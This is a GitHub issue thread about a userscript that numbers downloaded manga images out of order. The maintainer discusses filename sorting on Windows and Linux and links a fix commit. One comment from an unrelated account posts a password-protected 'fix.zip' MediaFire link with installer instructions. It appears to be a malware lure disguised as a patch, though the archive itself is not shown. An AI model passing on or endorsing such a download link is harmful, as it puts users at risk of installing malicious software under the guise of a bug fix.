### ISSUE TITLE
绅士漫画下载序号出错？

### ISSUE THREAD

**Issue by Smile8848** [MapoMagpie/eh-view-enhance#89]
**Describe the bug**
绅士漫画下载本子序号出错
**Browser And Version**
Which Browser Do You Use? And Browser Version
你使用什么浏览器与版本？
Cent Browser
版本 5.1.1130.129（正式版本） （64 位） (Portable) (Chromium 118.0.5993.159)
**Log**
Press F12, Open Browser Console. Export or Copy Console Log.
打开浏览器控制台，导出或复制控制台日志，粘贴到此处。

**Screenshots**
如果可以，请提供安全的图片
![QQ截图20240828161947](https://github.com/user-attachments/assets/620aaf75-9e7f-4da0-8811-c3229b0f1fdf)
下载的photos-index-aid-110037

**Comment by MapoMagpie** [comment]
感谢反馈，我会尽快修改文件名的排序检测，或添加一个强制添加序号的选项。

我记得以前Windows文件排序是按数字字母方式排序的，类似这样 1.jpg, 10.jpg, 11.jpg, 2.jpg, 20.jpg, 21.jpg
没想到现在变成这样了: https://docs.pingcode.com/ask/311482.html
而linux下还是严格按照数字字母方式排序的。

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MapoMagpie** [comment]
[feat: new option 'filenameOrder'](https://github.com/MapoMagpie/eh-view-enhance/commit/0cb391a81c7fbda5a3bfd4f6f8f7c6d6f1812830)
